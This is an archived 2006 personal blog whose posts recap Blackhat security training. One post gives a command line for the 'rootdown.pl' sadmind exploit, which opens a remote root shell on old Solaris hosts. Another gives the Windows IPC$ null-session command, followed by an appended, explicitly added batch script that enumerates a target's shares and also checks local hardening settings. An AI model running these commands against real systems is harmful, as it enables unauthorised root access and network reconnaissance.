This blog has moved!

If you are not automatically redirected to the new address, please direct your browser to
http://www.juxtaservices.com/blog/
and update your bookmarks.

Monday, July 31, 2006

Blackhat Day 2

So, I completed day three of Blackhat 2006 today, which was the first day of my Advanced Database Hacking class, but it was riddled with technical difficulties and issues with the material, so I am going to put off a recap until after class tomorrow in the hope that it will pick up and come through with some good stuff for the last day.

I do, however, owe a recap of day 2, which was the final day of "Ultimate Hacking", put on by Foundstone. Day two covered Unix-based exploits and involved some really good tools and techniques. While in general it is harder to hack than Windows, because it can be locked down better, I was surprised by how many useful techniques can be employed to enumerate and attack Unix-based hosts.

The gem of the day I am going to share with you is a tool that exploits 'sadmind', the Solstice AdminSuite daemon that Solaris exposes as an RPC service, to remotely gain root on any version of Solaris 9 and below. Sun labeled the weak default authentication a "feature", so it went unpatched for some time on the grounds that the functionality was desirable, and on most Solaris installs the service is still enabled, since it takes a fairly security-conscious admin to know to check (rpcinfo will show whether sadmind is registered) and to disable it in inetd.conf or run it at a stricter security level.

The tool is a script called 'rootdown.pl' and can be downloaded from metasploit.com (the original post linked it directly). To run it against a remote host and open an interactive root shell, give it the target with -h and request interactive mode with -i:

perl -w rootdown.pl -h <target host> -i

Saturday, July 29, 2006

Blackhat Day 1 - Windows Lose or Draw


Today was day one of Blackhat here in Las Vegas. Let me just start by saying I'd forgotten how much I dislike the Vegas strip. In concept, I guess it seems cool: flashing lights, dazzling fountains, and fabulous buffets, but when you actually get here it really just turns out to be flashing prostitutes, dizzying second-hand smoke, and a flabulous mass of sweaty, scantily clad tourists. Not such a pretty thing. Oh, and not being a gambler, it bugs me that everything is geared towards trying to force you into the casino. All recreational activities end at 8pm (unless it's a weekend, then it's 6pm) to try and shuffle you onto the gaming floor for more smoke-filled bliss than you can shake a stack of hooker pamphlets at (and yea, although there are fewer than last time I was here, the hand slappers are still alive and well - just wait 'til dark).

Oh well, I am made to suffer these things for a very noble cause. Hacking. Or rather, hacking deterrence. The first of my two Blackhat courses was an "Ultimate Hacking" course taught by Foundstone, a security consulting and development company currently owned by McAfee. To say it was eye-opening would be an understatement. Today's class (the first of 2 days) covered Windows exploits and how to hack a Windows host. Having never really become intimately involved with current Windows hacking practices, I finally became completely and utterly convinced of the adamant arguments posted by all those "Unix groupies" (into which I am slowly converting) about how insecure Windows is. Well, tomorrow we cover Unix exploits, so we will be able to compare the two after that, but for now, I am somewhat awestruck at how profound the techniques are for compromising Windows.

It seems to me that in its attempts to make everything so easily accessed and manipulated, there were some major security oversights in Windows. In fact, most of the tools needed to enumerate and fingerprint hosts and users are built-in Windows utilities, and the services they talk to are left open by default. Really, most of the attack (minus any password cracking) can be carried out using only the tools that ship with Windows.

I will give you one example of such a tool: the 'net' command. I am most familiar with it for spamming all the machines on a network with a message using the 'net send' option. However, it becomes even more useful when you use it to exploit a Windows "feature" (Microsoft's word for it) that allows a host to open a null session to another host: an SMB connection to the IPC$ share made with an empty user name and an empty password. The problem with this is that the information handed out over that anonymous connection is very plentiful and can quickly allow an attacker to profile the host, the domain, and the users stored on it. The session is created with the following, run from the command line (empty password first, then /user:"" for the empty user name):

net use \\hostname_or_ip\IPC$ "" /user:""

The connection, once established can then be viewed using:

net use

Once created, a plethora of other commands and tools can be used to profile the host. That's really all I can give you at the moment (gotta respect that Foundstone non-disclosure agreement), but it is a pretty powerful bit of info. You should check out Foundstone's website for some more cool tools and tips. I'm really looking forward to checking out the Unix hacks in tomorrow's class. Stay tuned for a recap on those soon.
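As an added example (not from the original post, and not Foundstone's course material), here is the null-session procedure above put into a small cmd.exe script, with the two follow-ups a practitioner wants: what to ask over the anonymous connection once it is up, and how to check from the target's side whether it hands that information out. The file name nullsession.cmd is assumed; the target host is whatever you pass in. The enumeration commands succeed or fail depending on the target's Lsa settings, which is exactly what the check mode reads back.

```batch
@echo off
rem Added example, not from the original post or from Foundstone's course material.
rem Usage:  nullsession.cmd enum <hostname-or-ip>   (run from the attacking host)
rem         nullsession.cmd check                    (run on a host you want to harden)
rem "nullsession.cmd" is an assumed file name; TARGET is whatever you pass in.
setlocal
if /i "%~1"=="enum"  goto :enum
if /i "%~1"=="check" goto :check
echo usage: %~nx0 enum ^<hostname-or-ip^>  ^|  %~nx0 check
exit /b 1

:enum
set "TARGET=%~2"
if "%TARGET%"=="" (
    echo enum needs a target host
    exit /b 1
)
rem 1. The null session: empty password ("") and empty user name (/user:"") against
rem    the IPC$ pipe share.
net use \\%TARGET%\IPC$ "" /user:""
if errorlevel 1 (
    echo null session refused: SMB blocked, or anonymous access restricted on the target
    exit /b 1
)
rem 2. Confirm the session is listed.
net use
rem 3. Read what the target gives away over the anonymous connection. Whether the
rem    share list comes back depends on the target's RestrictAnonymous settings.
net view \\%TARGET%
rem 4. Tear the session down so it does not linger in 'net use' output.
net use \\%TARGET%\IPC$ /delete
goto :eof

:check
rem Local hardening check. These Lsa values control what a null session may enumerate:
rem   RestrictAnonymous        1 blocks share/account enumeration on NT4/2000 (2000 also
rem                            accepts 2, which refuses anonymous access outright); on
rem                            XP/2003 it blocks share enumeration
rem   RestrictAnonymousSAM     1 blocks SAM account enumeration on XP/2003
rem   EveryoneIncludesAnonymous 0 keeps anonymous out of the Everyone group on XP/2003
rem A missing value means the OS default applies, which on NT4/2000 is the open setting.
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RestrictAnonymous
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RestrictAnonymousSAM
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v EveryoneIncludesAnonymous
rem Sessions currently open to this machine; an anonymous session shows a blank user name.
net session
goto :eof
```

Run the enum mode from a workstation on the same network as the target and the check mode on the machine you are defending; on a default Windows 2000 box the first returns a share list, and the second reports the Lsa values as absent.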

Friday, July 28, 2006

Countdown To Bl@khAt


Tomorrow afternoon, I'll be heading down to Vegas for Blackhat USA 2006 at Caesar's Palace. This is one of the world's top security/hacker-esque conferences, but it is geared more towards security professionals than other hacker conferences such as HOPE or Defcon are.

I will be attending 2 of the training sessions on Sat.-Sun. and then Mon.-Tues. which are "Ultimate Hacking: Black Hat Edition", which covers penetration testing and hardening, and "Advanced Database Security Assessment" which covers security issues obviously related to databases.

Props to my employer Doba for sponsoring this surely enlightening trip to Sin City. I will be taking the rest of the week off after the conference to hit the California coast with my family, but keep posted for more details and my impressions of the conference once I get the chance to dish it out. I am a little disappointed that I can't stick around for Defcon, which starts right after my training sessions end, but I'm sure the beach will compensate me for it. Until then, it's happy trails.

Thursday, July 27, 2006

The 'Tubes' that get us 'Internets'

Ted Stevens
So, if you keep up at all on technology and politics, you might have heard of Senator Ted Stevens (R-Alaska), who recently explained the reason for his opposing vote on the net-neutrality bill brought before the Commerce Committee. His intellectual response involves the analogy that the Internet is made up of "tubes". Check out the story with a link to the original audio at http://blog.wired.com/27BStroke6/?entry_id=1512499.

Once you're up to date on the original antics, you will really appreciate the comedy of a fake blog site created by "Senator Stevens", which really takes the Internet tube action to the next level! Check it out here (Also hosted on blogspot! Yea for blogspot!). I gotta say I got a really big kick out of it!

Welcome to my 00000001'st post (Nachooooooooooo!)


Just a shout-out welcome post to everyone joining me for this inaugural listing. I finally decided it was time to make my life a little more public after the many long hours spent in front of the LCD bliss, with family and friends always wanting to hear news but getting little response. I also find it amazing how many ideas I come across, or that come across me, in a day that I plan to act on, but usually only end up remembering until the next interesting idea comes along.

That said, the purpose of this blog will be to document some of those ideas and activities that I have been involved in, or the ones that are banging around in my head needing to get put down for later retrieval. You will most likely find here a mix of personal and professional as I plan to share thoughts on work, family, life, and various technology issues. And if no one ever really ends up reading this besides me, what the hell? I could care less. So, if you are up for it, join me for some hopefully insightful and entertaining entries in the future.